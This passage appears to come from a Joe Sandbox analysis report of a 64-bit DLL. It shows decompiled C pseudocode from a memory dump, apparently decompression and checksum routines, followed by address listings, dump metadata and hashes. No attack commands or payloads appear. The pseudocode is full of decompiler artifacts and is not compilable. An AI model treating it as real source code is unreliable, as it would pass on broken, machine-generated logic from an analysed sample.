				r9d =  *0x7FEF311EEE7 & 0x000000ff;
				if (r9b == 0) goto 0xf306092b;
				_t519 =  *((short*)(_t1240 + 0xdda));
				if (_t519 < 0) goto 0xf3060955;
				if ((_t519 & 0x0000ffff) - 0x200 < 0) goto 0xf30611d8;
				goto 0xf3060980;
				asm("dec eax");
				asm("adc eax, 0x0");
				if ( !_t519 - 0x23f > 0) goto 0xf306127b;
				_t521 =  *((short*)(_t1240 + 0x15da));
				if (_t521 < 0) goto 0xf306095a;
				_t770 = _t767 + 0x20 - r9d - 0xb;
				if ((_t521 & 0x1ff) - 0x1d > 0) goto 0xf30612ae;
				r9d =  *0x7FEF311EF47 & 0x000000ff;
				 *(_t1204 + 0x68) =  *0x7FEF311EF66 & 0x0000ffff;
				 *((long long*)(_t1204 + 0x118)) = _t1231;
				if (r9d == 0) goto 0xf3060a01;
				if (_t770 - 0x1d > 0) goto 0xf30609e2;
				if (__r15 - _t1282 - 3 <= 0) goto 0xf306140a;
				_t1161 = ((( *(_t1204 + 0x30) | _t990) >> 0x0000000a >> 0xb | __r15 - _t1281 << _t767) >> r9d >> 0xb | 0xffffffff << r9d << _t770) >> r9d;
				_t772 = _t770 + 0x20 - r9d;
				 *(_t1204 + 0x68) = ( !( *_t1282) & _t742) +  *(_t1204 + 0x68);
				r9d =  *(_t1204 + 0x68);
				if (_t1219 - _t1231 >= 0) goto 0xf3060a19;
				if ( *((intOrPtr*)(_t1204 + 0xf4)) != 0) goto 0xf30612b6;
				 *((long long*)(_t1204 + 0x70)) = _t1259;
				 *((long long*)(_t1204 + 0x120)) = 0xf311ef68;
				 *((long long*)(_t1204 + 0x28)) =  *(_t1204 + 0xb8);
				 *((long long*)(_t1204 + 0x20)) = 0xf311ef68;
				_t1079 = _t1248;
				_t1130 =  *((intOrPtr*)(_t1204 + 0x1a8));
				E000007FE7FEF306148C(_t1079, _t1130, _t1219, _t1231);
				if ( *((intOrPtr*)(_t1204 + 0x1a8)) - _t1219 +  *((intOrPtr*)(_t1204 + 0x120)) - 0x103 >= 0) goto 0xf306076a;
				goto 0xf3060b66;
				 *(_t1204 + 0x40) = _t772;
				goto 0xf305f43b;
				_t1006 =  *(_t1204 + 0xb8);
				 *((long long*)(_t1204 + 0x28)) = _t1006;
				 *((long long*)(_t1204 + 0x20)) = _t1079;
				_t1080 =  *((intOrPtr*)(_t1204 + 0x1a0));
				_t530 = E000007FE7FEF306148C(_t1080, _t1130, _t1079,  *((intOrPtr*)(_t1204 + 0x118)));
				_t1242 =  *((intOrPtr*)(_t1204 + 0x58));
				r12b = 0xc;
				goto 0xf305f43b;
				_t680 = _t530;
				_t1132 = _t1130 << _t680 |  *(_t1204 + 0x30);
				 *(_t1204 + 0x30) = _t1132;
				 *(_t1204 + 0x38) = _t530 + 0x10;
				goto 0xf3060aee;
				_t743 =  *((short*)(_t1242 + 0x3c + _t1080 * 2));
				if (_t743 < 0) goto 0xf3060b0d;
				goto 0xf3060b39;
				asm("dec eax");
				asm("adc edi, 0x0");
				if ( !(_t743 & 0x000001ff) - 0x23f > 0) goto 0xf30611c7;
				_t746 =  *((short*)(_t1242 + 0x83c + _t1161 * 2));
				if (_t746 < 0) goto 0xf3060b12;
				r12b = 0x22;
				if (0xa == 0) goto 0xf305f43b;
				 *(_t1204 + 0x30) = _t1132 >> 0xb;
				 *(_t1204 + 0x38) = _t680 - 0xb;
				 *(_t1204 + 0x40) = _t746 & 0x0000ffff;
				r12b = 0xd;
				goto 0xf305f43b;
				r12b = 0x14;
				 *(_t1204 + 0x30) = _t1161;
				 *(_t1204 + 0x38) = _t772;
				 *(_t1204 + 0x3c) =  *(_t1204 + 0x68);
				 *(_t1204 + 0x40) = 0x100;
				 *(_t1204 + 0x44) = r9d;
				goto 0xf305f43b;
				 *((char*)(_t1080 + 8)) = 0xfd;
				 *_t1080 = _t1006;
				 *((long long*)(_t1080 + 0x10)) = _t1006;
				goto 0xf3061193;
				r12b = 0x13;
				goto 0xf3060c5a;
				r12d = r12d >> 8;
				r9d = r12d;
				r12b = 2;
				_t1243 =  *((intOrPtr*)(_t1204 + 0x58));
				goto 0xf3060c14;
				r12d = r12d >> 8;
				r9d = r12d;
				r12b = 3;
				goto 0xf3060c31;
				r12d = r12d >> 8;
				r9d = r12d;
				r12b = 9;
				goto 0xf3060c31;
				r12b = 0xe;
				goto 0xf3060bdb;
				r12b = 0x10;
				r9d = 2 >> 8 >> 8;
				goto 0xf3060c31;
				r12b = 0xb;
				goto 0xf3060bee;
				r12b = 0x11;
				r9d = 0x100 >> 8 >> 8;
				goto 0xf3060c31;
				r12d = r12d >> 8;
				r9d = r12d;
				r12b = 0xa;
				goto 0xf3060c31;
				r12d = r12d >> 8;
				r9d = r12d;
				r12b = 5;
				goto 0xf3060c31;
				r9d = r12d;
				r12b = 8;
				goto 0xf3060c34;
				r12d = r12d >> 8;
				r9d = r12d;
				r12b = 0x17;
				goto 0xf3060c31;
				r12d = r12d >> 8;
				r9d = r12d;
				r12b = 0xf;
				if (r9b == 1) goto 0xf3060c9a;
				_t536 = r9b & 0xffffffff;
				if (_t536 == 0xfc) goto 0xf3060cbe;
				_t687 =  *(_t1204 + 0x38);
				_t750 =  >=  ? _t536 - r15d + r14d : _t687 >> 3;
				_t539 = _t1161 * 8;
				 *(_t1204 + 0x38) = _t687 - _t539;
				_t1170 =  &(_t1282[1]);
				_t1202 =  *((intOrPtr*)(_t1204 + 0x1b0));
				goto 0xf3060cc0;
				_t1081 =  *((intOrPtr*)(_t1204 + 0x1a8));
				if ( *((intOrPtr*)(_t1204 + 0x70)) != _t1081) goto 0xf3060cbb;
				r9b = 2;
				r9b = r9b - (_t539 & 0xffffff00 | r12b == 0x00000017);
				_t1226 = _t1081;
				goto 0xf3060cc0;
				r9b = 1;
				 *(_t1243 + 0x291c) = r12b;
				_t689 =  *(_t1204 + 0x38);
				 *(_t1243 + 8) = _t689;
				 *(_t1243 + 0x24) =  *(_t1204 + 0x3c);
				 *(_t1243 + 0x28) =  *(_t1204 + 0x40);
				 *(_t1243 + 0x2c) =  *(_t1204 + 0x44);
				 *_t1243 =  !(0xffffffff << _t689) &  *(_t1204 + 0x30);
				_t952 =  *(_t1204 + 0x1b8) & 0x00000040;
				if (_t952 != 0) goto 0xf3061169;
				if (_t952 == 0) goto 0xf3061169;
				_t953 = r9b;
				if (_t953 < 0) goto 0xf3061169;
				_t1050 = _t1226 - _t1202;
				if (_t953 < 0) goto 0xf306137a;
				 *(_t1204 + 0xb8) = _t1161;
				 *(_t1204 + 0x6c) = r9d;
				if (_t1226 -  *((intOrPtr*)(_t1204 + 0x1a8)) > 0) goto 0xf3061389;
				_t543 =  *(_t1243 + 0x20);
				_t1251 =  *((intOrPtr*)(_t1204 + 0x1a0)) + _t1202;
				_t753 = _t543 & 0x0000ffff;
				asm("xorps xmm0, xmm0");
				asm("movaps [esp+0xc0], xmm0");
				asm("movaps [esp+0xa0], xmm0");
				_t1083 = _t1050 & 0xfffffffc;
				 *(_t1204 + 0xf8) = _t1050;
				 *(_t1204 + 0x108) = _t1050;
				_t1015 = _t1083 - 0x3f51f0dfc0;
				 *(_t1204 + 0x50) = _t1015;
				r12d = 0x56c0;
				 *(_t1204 + 0xe8) = _t1251;
				 *(_t1204 + 0xd8) = _t1170;
				 *(_t1204 + 0x7c) = _t753;
				 *(_t1204 + 0x100) = _t1083;
				if (0x3f51f0dfc0 - __r12 < 0) goto 0xf3060efe;
				r11d = _t753 * 0x56c0;
				_t1262 = _t1251;
				 *(_t1204 + 0x80) =  *_t1262 & 0x000000ff;
				 *(_t1204 + 0x84) = _t1262[1] & 0x000000ff;
				 *(_t1204 + 0x88) = _t1262[2] & 0x000000ff;
				 *(_t1204 + 0x8c) = _t1262[3] & 0x000000ff;
				r10d = 0;
				 *((intOrPtr*)(_t1204 + 0xc0 + _t1243 * 4)) =  *((intOrPtr*)(_t1204 + 0xc0 + _t1243 * 4)) +  *((intOrPtr*)(_t1204 + 0x80 + _t1243 * 4));
				_t341 = _t1243 + 1; // 0x1
				if (_t341 != 4) goto 0xf3060e1d;
				asm("movaps xmm0, [esp+0xc0]");
				asm("movaps [esp+0x80], xmm0");
				 *((intOrPtr*)(_t1204 + 0xa0 + _t1170 * 4)) =  *((intOrPtr*)(_t1204 + 0xa0 + _t1170 * 4)) +  *((intOrPtr*)(_t1204 + 0x80 + _t1170 * 4));
				_t351 = _t1170 + 1; // 0x1
				_t957 = _t351 - 4;
				if (_t957 != 0) goto 0xf3060e4c;
				_t1016 = _t1015 + 0xfffffffc;
				if (_t957 != 0) goto 0xf3060dea;
				_t587 =  *(_t1204 + 0xc0 + _t1016 * 4);
				 *(_t1204 + 0xc0 + _t1016 * 4) = _t587;
				_t358 = _t1016 + 1; // 0x1
				_t1051 = _t358;
				_t1017 = _t1051;
				if (_t1051 != 4) goto 0xf3060e77;
				 *((intOrPtr*)(_t1204 + 0xa0 + _t1017 * 4)) =  *((intOrPtr*)(_t1204 + 0xa0 + _t1017 * 4)) - _t587 * 0xfff1;
				_t365 = _t1017 + 1; // 0x1
				if (_t365 != 4) goto 0xf3060ea7;
				_t1021 = _t1202 * _t1083 >> 0x2f;
				_t960 = 0x3f51f08900 - __r12;
				if (_t960 >= 0) goto 0xf3060de2;
				_t1288 =  *(_t1204 + 0x108);
				r14d = r14d & 0x00000003;
				_t1229 =  *((intOrPtr*)(_t1204 + 0x58));
				r10d =  *(_t1204 + 0x1b8);
				_t1175 =  *(_t1204 + 0xe8);
				r12d =  *(_t1204 + 0x7c);
				if (_t960 == 0) goto 0xf3060fc8;
				_t1234 = 0x3f51f0dfc0 + _t1175;
				 *(_t1204 + 0x80) =  *_t1234 & 0x000000ff;
				 *(_t1204 + 0x84) = _t1234[1] & 0x000000ff;
				 *(_t1204 + 0x88) = _t1234[2] & 0x000000ff;
				 *(_t1204 + 0x8c) = _t1234[3] & 0x000000ff;
				 *((intOrPtr*)(_t1204 + 0xc0 + _t1021 * 4)) =  *((intOrPtr*)(_t1204 + 0xc0 + _t1021 * 4)) +  *((intOrPtr*)(_t1204 + 0x80 + _t1021 * 4));
				_t389 = _t1021 + 1; // 0x1
				_t1139 = _t389;
				_t1022 = _t1139;
				if (_t1139 != 4) goto 0xf3060f72;
				asm("movaps xmm0, [esp+0xc0]");
				asm("movaps [esp+0x80], xmm0");
				_t719 =  *(_t1204 + 0x80 + _t1022 * 4);
				 *((intOrPtr*)(_t1204 + 0xa0 + _t1022 * 4)) =  *((intOrPtr*)(_t1204 + 0xa0 + _t1022 * 4)) + _t719;
				_t399 = _t1022 + 1; // 0x1
				_t1140 = _t399;
				_t1023 = _t1140;
				_t962 = _t1140 - 4;
				if (_t962 != 0) goto 0xf3060f9f;
				if (_t962 != 0) goto 0xf3060f41;
				_t720 = _t719 * 0xfff1;
				 *((intOrPtr*)(_t1204 + 0xc0 + _t1023 * 4)) =  *((intOrPtr*)(_t1204 + 0xc0 + _t1023 * 4)) - _t720;
				_t407 = _t1023 + 1; // 0x1
				_t1144 = _t407;
				_t1024 = _t1144;
				if (_t1144 != 4) goto 0xf3060fd7;
				r9d =  *(_t1204 + 0x6c);
				 *((intOrPtr*)(_t1204 + 0xa0 + _t1024 * 4)) =  *((intOrPtr*)(_t1204 + 0xa0 + _t1024 * 4)) - _t720 * 0xfff1;
				_t416 = _t1024 + 1; // 0x1
				_t1148 = _t416;
				_t1025 = _t1148;
				if (_t1148 != 4) goto 0xf3061019;
				 *(_t1204 + 0xa0 + _t1025 * 4) =  *(_t1204 + 0xa0 + _t1025 * 4) << 2;
				_t1026 = _t1025 + 1;
				if (_t1026 != 4) goto 0xf3061051;
				 *((intOrPtr*)(_t1204 + 0xa4)) =  *((intOrPtr*)(_t1204 + 0xa4)) -  *((intOrPtr*)(_t1204 + 0xc4)) + 0xfff1;
				 *((intOrPtr*)(_t1204 + 0xa8)) =  ~( *((intOrPtr*)(_t1204 + 0xc8)) +  *((intOrPtr*)(_t1204 + 0xc8))) +  *((intOrPtr*)(_t1204 + 0xa8)) + 0x1ffe2;
				 *((intOrPtr*)(_t1204 + 0xac)) =  *((intOrPtr*)(_t1204 + 0xac)) + _t1148 + _t1148 * 2;
				_t1027 = _t1026 + 1;
				if (_t1027 != 4) goto 0xf30610b4;
				r12d = r12d *  *(_t1204 + 0x50);
				_t1029 = _t1027 * _t1202 >> 0x2f;
				_t1030 = _t1029 + 1;
				if (_t1030 != 4) goto 0xf30610e4;
				if (_t1288 == 0) goto 0xf306110b;
				_t699 = r12d +  *((intOrPtr*)(_t1204 + 0xc0 + _t1026 * 4)) + ( *(_t1175 +  *(_t1204 + 0x100) + _t1030) & 0x000000ff);
				_t818 = (_t543 >> 0x10) + r11d + r12d - 0x800000007961 +  *((intOrPtr*)(_t1204 + 0xa0 + _t1029 * 4)) + _t699;
				if (_t1288 != _t1030 + 1) goto 0xf30610fb;
				_t572 = _t818 * 0xfff1;
				_t821 = _t818 - _t572 << 0x00000010 | _t699 - _t699 * 0x0000fff1;
				 *(_t1229 + 0x20) = _t821;
				_t970 = r9b;
				if (_t970 != 0) goto 0xf30611a7;
				r10d = r10d & 0x00000001;
				if (_t970 == 0) goto 0xf306117f;
				r9b = _t821 ==  *((intOrPtr*)(_t1229 + 0x14));
				r9b = r9b + r9b;
				r9b = r9b + 0xfe;
				goto 0xf306117f;
				_t1037 =  *((intOrPtr*)(_t1204 + 0x110));
				 *(_t1037 + 8) = r9b;
				 *_t1037 =  *((intOrPtr*)(_t1204 + 0xe0)) -  *(_t1204 + 0xb8) + __r15 +  *(_t1204 + 0xd8);
				 *((long long*)(_t1037 + 0x10)) = _t1229 - _t1202;
				return _t572;
			}

0x7fef305fce7
0x7fef305fcf3
0x7fef305fcf5
0x7fef305fd04
0x7fef305fd09
0x7fef305fd15
0x7fef305fd18
0x7fef305fd1d
0x7fef305fd20
0x7fef305fd24
0x7fef305fd27
0x7fef305fd2a
0x7fef305fd2f
0x7fef305fd36
0x7fef305fd38
0x7fef305fd3a
0x7fef305fd4a
0x7fef305fd4d
0x7fef305fd56
0x7fef305fd59
0x7fef305fd61
0x7fef305fd66
0x7fef305fd69
0x7fef305fd72
0x7fef305fd7a
0x7fef305fd81
0x7fef305fd95
0x7fef305fd9f
0x7fef305fda3
0x7fef305fda9
0x7fef305fdb3
0x7fef305fdb6
0x7fef305fdca
0x7fef305fdce
0x7fef305fdd9
0x7fef305fde2
0x7fef305fde7
0x7fef305fdf0
0x7fef305fdf8
0x7fef305fdfe
0x7fef305fe01
0x7fef305fe0c
0x7fef305fe13
0x7fef305fe1e
0x7fef305fe25
0x7fef305fe2e
0x7fef305fe35
0x7fef305fe41
0x7fef305fe47
0x7fef305fe4d
0x7fef305fe55
0x7fef305fe64
0x7fef305fe68
0x7fef305fe6d
0x7fef305fe70
0x7fef305fe74
0x7fef305fe83
0x7fef305fe8b
0x7fef305fe96
0x7fef305fea1
0x7fef305feaa
0x7fef305feae
0x7fef305feb7
0x7fef305febd
0x7fef305fec8
0x7fef305feca
0x7fef305fecf
0x7fef305fed3
0x7fef305fed6
0x7fef305fedb
0x7fef305fedd
0x7fef305fee1
0x7fef305fee4
0x7fef305fee8
0x7fef305fef6
0x7fef305fefe
0x7fef305ff09
0x7fef305ff14
0x7fef305ff1d
0x7fef305ff21
0x7fef305ff2a
0x7fef305ff3d
0x7fef305ff45
0x7fef305ff4c
0x7fef305ff50
0x7fef305ff58
0x7fef305ff5e
0x7fef305ff66
0x7fef305ff6a
0x7fef305ff7b
0x7fef305ff81
0x7fef305ff86
0x7fef305ff8f
0x7fef305ff93
0x7fef305ff9b
0x7fef305ffa9
0x7fef305ffac
0x7fef305ffb2
0x7fef305ffb8
0x7fef305ffbc
0x7fef305ffbf
0x7fef305ffc7
0x7fef305ffd7
0x7fef305ffe0
0x7fef305ffe7
0x7fef305fff5
0x7fef3060000
0x7fef306000b
0x7fef306000d
0x7fef3060012
0x7fef3060014
0x7fef306001c
0x7fef3060028
0x7fef306002c
0x7fef3060035
0x7fef306003b
0x7fef3060046
0x7fef306004f
0x7fef3060054
0x7fef3060059
0x7fef3060068
0x7fef306006b
0x7fef306006e
0x7fef3060073
0x7fef3060076
0x7fef306007d
0x7fef3060083
0x7fef306008f
0x7fef3060092
0x7fef3060095
0x7fef306009a
0x7fef306009d
0x7fef30600a9
0x7fef30600b4
0x7fef30600c1
0x7fef30600ca
0x7fef30600ce
0x7fef30600d7
0x7fef30600dd
0x7fef30600ea
0x7fef30600f1
0x7fef30600fa
0x7fef3060101
0x7fef306010c
0x7fef306011e
0x7fef306012d
0x7fef306013b
0x7fef306013e
0x7fef3060142
0x7fef3060149
0x7fef306014b
0x7fef3060151
0x7fef3060159
0x7fef3060160
0x7fef3060167
0x7fef306016e
0x7fef3060175
0x7fef306017e
0x7fef306018c
0x7fef3060194
0x7fef306019a
0x7fef306019d
0x7fef30601a8
0x7fef30601af
0x7fef30601b7
0x7fef30601ba
0x7fef30601c0
0x7fef30601ca
0x7fef30601ce
0x7fef30601db
0x7fef30601e1
0x7fef30601e5
0x7fef30601e9
0x7fef30601f2
0x7fef30601f7
0x7fef3060200
0x7fef306020b
0x7fef3060214
0x7fef3060217
0x7fef306022d
0x7fef3060231
0x7fef3060236
0x7fef3060241
0x7fef3060244
0x7fef3060254
0x7fef3060259
0x7fef306025c
0x7fef3060261
0x7fef3060265
0x7fef3060267
0x7fef3060271
0x7fef3060279
0x7fef3060284
0x7fef3060290
0x7fef30602a3
0x7fef30602a7
0x7fef30602ae
0x7fef30602b0
0x7fef30602b4
0x7fef30602ba
0x7fef30602c6
0x7fef30602dd
0x7fef30602e2
0x7fef30602ee
0x7fef30602f4
0x7fef30602fc
0x7fef306030a
0x7fef3060310
0x7fef3060314
0x7fef306031d
0x7fef3060323
0x7fef306032c
0x7fef306033e
0x7fef3060342
0x7fef3060344
0x7fef3060348
0x7fef3060357
0x7fef306035b
0x7fef3060364
0x7fef306036f
0x7fef3060371
0x7fef306037c
0x7fef3060386
0x7fef306038a
0x7fef3060392
0x7fef3060395
0x7fef306039f
0x7fef30603a2
0x7fef30603ab
0x7fef30603b8
0x7fef30603be
0x7fef30603c7
0x7fef30603cb
0x7fef30603d2
0x7fef30603d8
0x7fef30603de
0x7fef30603e5
0x7fef30603eb
0x7fef30603f0
0x7fef30603fc
0x7fef30603ff
0x7fef3060407
0x7fef306040b
0x7fef3060411
0x7fef3060416
0x7fef306041d
0x7fef306041f
0x7fef3060424
0x7fef3060434
0x7fef3060439
0x7fef306043d
0x7fef3060445
0x7fef306044d
0x7fef3060453
0x7fef3060455
0x7fef306045b
0x7fef306045f
0x7fef3060462
0x7fef3060467
0x7fef306046d
0x7fef306047a
0x7fef3060480
0x7fef3060485
0x7fef306048b
0x7fef3060491
0x7fef30604a4
0x7fef30604a6
0x7fef30604a9
0x7fef30604ae
0x7fef30604b2
0x7fef30604b6
0x7fef30604b9
0x7fef30604d1
0x7fef30604d6
0x7fef30604da
0x7fef30604de
0x7fef30604e1
0x7fef30604f8
0x7fef30604fd
0x7fef3060506
0x7fef306050e
0x7fef3060516
0x7fef3060522
0x7fef3060526
0x7fef306052c
0x7fef3060541
0x7fef3060552
0x7fef3060560
0x7fef306056c
0x7fef3060574
0x7fef306057b
0x7fef306057f
0x7fef3060582
0x7fef3060587
0x7fef3060599
0x7fef306059d
0x7fef30605a3
0x7fef30605a9
0x7fef30605af
0x7fef30605bf
0x7fef30605c5
0x7fef30605c9
0x7fef30605ce
0x7fef30605d4
0x7fef30605de
0x7fef30605eb
0x7fef30605f0
0x7fef30605f8
0x7fef3060600
0x7fef3060605
0x7fef3060608
0x7fef3060615
0x7fef306061f
0x7fef3060624
0x7fef306062f
0x7fef3060638
0x7fef3060640
0x7fef306064b
0x7fef306064d
0x7fef3060652
0x7fef3060654
0x7fef306065c
0x7fef3060668
0x7fef306066c
0x7fef3060674
0x7fef306067a
0x7fef3060685
0x7fef306068e
0x7fef3060693
0x7fef306069c
0x7fef30606a9
0x7fef30606af
0x7fef30606b7
0x7fef30606bb
0x7fef30606c0
0x7fef30606c6
0x7fef30606cb
0x7fef30606d0
0x7fef30606d4
0x7fef30606e1
0x7fef30606ea
0x7fef30606f6
0x7fef3060702
0x7fef3060713
0x7fef306071a
0x7fef306071e
0x7fef3060721
0x7fef3060726
0x7fef306072e
0x7fef3060731
0x7fef3060736
0x7fef3060739
0x7fef306073e
0x7fef3060741
0x7fef306074b
0x7fef3060755
0x7fef306075d
0x7fef3060765
0x7fef306076d
0x7fef3060770
0x7fef3060777
0x7fef3060780
0x7fef3060787
0x7fef306078a
0x7fef306079b
0x7fef30607a3
0x7fef30607ad
0x7fef30607ba
0x7fef30607c3
0x7fef30607c7
0x7fef30607d0
0x7fef30607e1
0x7fef30607e3
0x7fef30607ef
0x7fef30607f3
0x7fef3060800
0x7fef3060808
0x7fef3060813
0x7fef306081e
0x7fef3060827
0x7fef306082b
0x7fef3060833
0x7fef3060839
0x7fef3060846
0x7fef3060848
0x7fef306084e
0x7fef3060856
0x7fef306085c
0x7fef306085e
0x7fef3060862
0x7fef3060866
0x7fef306086a
0x7fef306086c
0x7fef3060877
0x7fef306087d
0x7fef3060892
0x7fef306089e
0x7fef30608a3
0x7fef30608aa
0x7fef30608b4
0x7fef30608bf
0x7fef30608c8
0x7fef30608d4
0x7fef30608e2
0x7fef30608fc
0x7fef306090e
0x7fef3060932
0x7fef306093d
0x7fef3060948
0x7fef3060953
0x7fef306095c
0x7fef3060960
0x7fef3060968
0x7fef306096e
0x7fef306097b
0x7fef3060988
0x7fef306098d
0x7fef306099a
0x7fef30609aa
0x7fef30609b1
0x7fef30609b9
0x7fef30609be
0x7fef30609ca
0x7fef30609f3
0x7fef30609f6
0x7fef30609fd
0x7fef3060a01
0x7fef3060a09
0x7fef3060a13
0x7fef3060a19
0x7fef3060a20
0x7fef3060a30
0x7fef3060a35
0x7fef3060a3a
0x7fef3060a3d
0x7fef3060a48
0x7fef3060a83
0x7fef3060a89
0x7fef3060a8e
0x7fef3060a95
0x7fef3060a9a
0x7fef3060aa2
0x7fef3060aa7
0x7fef3060aac
0x7fef3060aaf
0x7fef3060abc
0x7fef3060ac1
0x7fef3060ac7
0x7fef3060ad0
0x7fef3060ad5
0x7fef3060ade
0x7fef3060ae6
0x7fef3060aea
0x7fef3060af6
0x7fef3060afe
0x7fef3060b0b
0x7fef3060b14
0x7fef3060b18
0x7fef3060b21
0x7fef3060b27
0x7fef3060b34
0x7fef3060b39
0x7fef3060b3e
0x7fef3060b47
0x7fef3060b4e
0x7fef3060b52
0x7fef3060b56
0x7fef3060b59
0x7fef3060b63
0x7fef3060b66
0x7fef3060b6b
0x7fef3060b73
0x7fef3060b77
0x7fef3060b7b
0x7fef3060b80
0x7fef3060b85
0x7fef3060b8b
0x7fef3060b8e
0x7fef3060b92
0x7fef3060b97
0x7fef3060b9f
0x7fef3060ba4
0x7fef3060ba8
0x7fef3060bab
0x7fef3060bae
0x7fef3060bb3
0x7fef3060bb5
0x7fef3060bb9
0x7fef3060bbc
0x7fef3060bbf
0x7fef3060bc1
0x7fef3060bc5
0x7fef3060bc8
0x7fef3060bcb
0x7fef3060bd0
0x7fef3060bd3
0x7fef3060bd8
0x7fef3060bdb
0x7fef3060bde
0x7fef3060be3
0x7fef3060be6
0x7fef3060beb
0x7fef3060bee
0x7fef3060bf1
0x7fef3060bf3
0x7fef3060bf7
0x7fef3060bfa
0x7fef3060bfd
0x7fef3060bff
0x7fef3060c03
0x7fef3060c06
0x7fef3060c09
0x7fef3060c0b
0x7fef3060c0e
0x7fef3060c19
0x7fef3060c1b
0x7fef3060c1f
0x7fef3060c22
0x7fef3060c25
0x7fef3060c27
0x7fef3060c2b
0x7fef3060c2e
0x7fef3060c47
0x7fef3060c49
0x7fef3060c52
0x7fef3060c68
0x7fef3060c73
0x7fef3060c76
0x7fef3060c7f
0x7fef3060c83
0x7fef3060c90
0x7fef3060c98
0x7fef3060c9a
0x7fef3060ca5
0x7fef3060cae
0x7fef3060cb1
0x7fef3060cb6
0x7fef3060cb9
0x7fef3060cbb
0x7fef3060cc0
0x7fef3060cc7
0x7fef3060cdd
0x7fef3060ce5
0x7fef3060ced
0x7fef3060cf5
0x7fef3060cf9
0x7fef3060cfc
0x7fef3060cff
0x7fef3060d0a
0x7fef3060d10
0x7fef3060d13
0x7fef3060d1c
0x7fef3060d1f
0x7fef3060d25
0x7fef3060d2d
0x7fef3060d3d
0x7fef3060d43
0x7fef3060d47
0x7fef3060d4a
0x7fef3060d52
0x7fef3060d55
0x7fef3060d5d
0x7fef3060d68
0x7fef3060d80
0x7fef3060d88
0x7fef3060d9d
0x7fef3060da0
0x7fef3060da5
0x7fef3060dae
0x7fef3060db6
0x7fef3060dbe
0x7fef3060dc2
0x7fef3060dca
0x7fef3060dd3
0x7fef3060de7
0x7fef3060dfe
0x7fef3060e05
0x7fef3060e0c
0x7fef3060e13
0x7fef3060e1a
0x7fef3060e25
0x7fef3060e2d
0x7fef3060e38
0x7fef3060e3a
0x7fef3060e42
0x7fef3060e53
0x7fef3060e5a
0x7fef3060e61
0x7fef3060e65
0x7fef3060e6b
0x7fef3060e6f
0x7fef3060e8f
0x7fef3060e91
0x7fef3060e98
0x7fef3060e98
0x7fef3060e9c
0x7fef3060ea3
0x7fef3060ec1
0x7fef3060ec8
0x7fef3060ed3
0x7fef3060ee9
0x7fef3060ef5
0x7fef3060ef8
0x7fef3060efe
0x7fef3060f06
0x7fef3060f1e
0x7fef3060f23
0x7fef3060f2b
0x7fef3060f33
0x7fef3060f38
0x7fef3060f3e
0x7fef3060f54
0x7fef3060f5b
0x7fef3060f62
0x7fef3060f69
0x7fef3060f79
0x7fef3060f80
0x7fef3060f80
0x7fef3060f84
0x7fef3060f8b
0x7fef3060f8d
0x7fef3060f95
0x7fef3060f9f
0x7fef3060fa6
0x7fef3060fad
0x7fef3060fad
0x7fef3060fb1
0x7fef3060fb4
0x7fef3060fb8
0x7fef3060fc2
0x7fef3060fe9
0x7fef3060ff1
0x7fef3060ff8
0x7fef3060ff8
0x7fef3060ffc
0x7fef3061003
0x7fef306100c
0x7fef3061033
0x7fef306103a
0x7fef306103a
0x7fef306103e
0x7fef3061045
0x7fef3061051
0x7fef3061059
0x7fef3061060
0x7fef306107e
0x7fef3061097
0x7fef30610a8
0x7fef30610bb
0x7fef30610c2
0x7fef30610c4
0x7fef30610d6
0x7fef30610eb
0x7fef30610f2
0x7fef30610f7
0x7fef30610ff
0x7fef3061101
0x7fef3061109
0x7fef306112c
0x7fef3061137
0x7fef3061139
0x7fef306113d
0x7fef3061140
0x7fef3061142
0x7fef3061156
0x7fef306115c
0x7fef3061160
0x7fef3061163
0x7fef3061167
0x7fef3061177
0x7fef3061188
0x7fef306118c
0x7fef306118f
0x7fef30611a6

Memory Dump Source

Source File: 00000001.00000002.915284627.000007FEF3041000.00000020.00000001.01000000.00000003.sdmp, Offset: 000007FEF3040000, based on PE: true

Associated: 00000001.00000002.915280675.000007FEF3040000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.915354749.000007FEF3101000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.915485518.000007FEF3169000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.915525428.000007FEF319C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.915532692.000007FEF319F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7fef3040000_loaddll64.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 911459ce35ec877975eca6671c6f7ac152e6c1aaca5ca051bcbecc58ce1bf366
Instruction ID: 86db7d209f3c6334cc907d5f545252e5a95d641bf679a643d85895efbb606957
Opcode Fuzzy Hash: 911459ce35ec877975eca6671c6f7ac152e6c1aaca5ca051bcbecc58ce1bf366
Instruction Fuzzy Hash: 3DF1F672B0C3C58BE7A48F19E4407AAB7E6F384794F148236DA9957BD8D63DE441EB00

Uniqueness

Uniqueness Score: -1.00%

Function 000007FEF3057B70 Relevance: .4, Instructions: 373
COMMONCrypto

Download Yara Rule

C-Code - Quality: 87%

			E000007FE7FEF3057B70(long long __rcx, long long __rdx, long long __r8, long long __r9) {
				void* _t82;
				void* _t124;
				void* _t131;
				void* _t135;
				void* _t141;
				void* _t147;
				void* _t152;
				void* _t154;
				void* _t157;
				void* _t158;
				long long _t159;
				void* _t166;
				void* _t175;
				long long _t178;
				void* _t179;
				signed long long _t181;
				void* _t182;
				void* _t184;
				void* _t185;
				void* _t193;
				void* _t194;
				void* _t196;
				long long _t199;
				void* _t200;
				void* _t202;
				void* _t206;
				void* _t209;
				void* _t211;
				signed long long _t221;
				signed long long _t223;
				signed long long _t227;
				void* _t229;
				signed long long _t232;
				void* _t235;
				signed long long _t237;
				void* _t242;
				void* _t243;
				signed long long _t247;
				void* _t248;
				void* _t250;
				void* _t251;
				void* _t252;
				signed long long _t254;
				void* _t255;
				void* _t257;
				void* _t258;
				void* _t268;
				long long _t271;
				long long* _t273;
				long long* _t276;
				long long _t280;
				long long _t281;
				void* _t282;
				void* _t283;
				long long _t284;
				void* _t285;
				void* _t289;
				void* _t291;
				signed long long _t292;
				signed long long _t293;

				_t281 = __r9;
				_t293 =  *((intOrPtr*)(_t268 + 0xa0));
				if (_t293 == 0) goto 0xf3057c35;
				 *((long long*)(_t268 + 0x30)) = __rdx;
				if (_t293 != 1) goto 0xf3057c65;
				r14d = 1;
				r13d = 0;
				_t286 =  <=  ? __rdx : _t285;
				_t283 =  >  ? _t229 : _t282;
				_t124 = _t283 - _t293;
